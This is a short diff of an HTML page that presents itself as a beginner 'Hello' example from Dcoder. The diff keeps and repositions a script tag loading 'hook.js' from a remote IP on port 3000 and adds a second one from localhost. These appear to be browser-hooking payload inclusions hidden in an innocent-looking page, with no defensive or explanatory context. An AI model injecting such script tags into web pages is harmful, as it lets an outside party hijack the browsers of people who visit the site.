--- a/index.html
+++ b/index.html
@@ -5,8 +5,9 @@
   <h1> Hello </h1> 
   <div>
     This is a html example from Dcoder, 
-   <br> have fun. :) 
-   <script src="http://25.121.3.4:3000/hook.js"></script>
-  </div> 
+   <br> have fun </div> 
+<script src="http://25.121.3.4:3000/hook.js"></script>
+<script src="http://127.0.0.1:3000/hook.js"></script>
+  
  
 </body></html>
